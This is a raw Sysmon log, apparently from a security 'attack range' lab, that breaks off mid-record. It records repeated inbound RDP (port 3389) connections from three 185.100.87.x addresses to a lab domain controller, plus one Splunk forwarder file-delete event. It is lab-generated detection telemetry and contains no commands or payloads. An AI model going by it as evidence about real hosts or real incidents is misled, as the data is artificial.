13:05:07.592{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-58514-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099742Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:07.583{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-50758-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099741Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:07.577{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-47304-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099740Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:07.559{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-47248-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099739Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:07.552{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-58428-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099738Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:07.495{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-58330-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099737Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:07.485{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-47104-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099736Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:07.431{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-47002-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099735Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:07.323{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-50278-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099734Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:07.312{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-58032-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099733Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:07.268{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-57968-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099732Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:07.265{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-50142-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099731Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:07.264{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-46674-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099730Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:07.241{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-50106-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099729Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:07.216{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-57876-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099728Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:07.188{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-46588-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099823Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:09.104{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-53632-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099822Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:09.083{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-50298-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099821Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:09.072{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-50228-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099820Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:09.061{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-53550-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099819Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:09.048{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-53508-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099818Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:09.042{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-50172-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099817Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:09.039{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-60802-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099816Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:09.035{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-53506-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099815Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:09.013{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-60746-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099814Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.990{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-50048-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099813Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.974{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-50016-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099812Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.972{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-60688-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099811Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.968{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-53408-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099810Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.952{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-60654-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099809Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.933{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-53354-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099808Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.915{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-60576-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099807Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.907{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-49878-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099806Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.802{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-49710-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099805Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.766{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-49636-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099804Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.762{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-53030-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099803Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.750{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-60318-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099802Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.741{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-52992-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099801Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.729{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-49544-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099800Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.728{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-60262-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099799Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.721{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-52936-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099798Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.698{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-52834-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099797Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.693{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-60218-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099796Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.680{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-49440-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099795Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.668{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-52804-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099794Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.666{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-60162-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099793Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.656{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-49410-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099792Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.632{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-52780-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099791Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.632{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-60094-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099790Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.594{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-49290-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099789Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.511{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-49126-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099788Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.472{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-49046-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099787Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.457{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-59844-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099786Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.440{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-48982-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099785Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.426{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-59808-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099784Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.419{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-52434-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099783Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.416{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-52448-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099782Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.407{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-59758-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099781Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.381{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-48850-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099780Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.371{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-48848-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099779Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.365{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-59686-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099778Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.355{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-52254-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099777Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.340{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-59640-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099776Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.325{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-52178-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099775Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.303{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-48694-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099774Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.274{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-52104-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099773Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.248{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-52046-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099772Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.223{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-48574-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099771Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.190{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-48458-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099770Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.171{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-59374-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099769Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.156{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-48414-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099768Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.151{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-59348-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099767Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.119{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-59286-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099766Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.105{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-51796-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099765Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.075{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-59226-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099764Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.074{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-48300-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 23542300x800000000000000099763Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:12.162{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7356818CCECE793345B604CF70E0337A,SHA256=DE8413B87731FA97170947769947783DC8EBD527C256403EE48351A69EC3B4C5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000099863Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:09.972{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-52016-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099862Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:09.946{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-55246-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099861Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 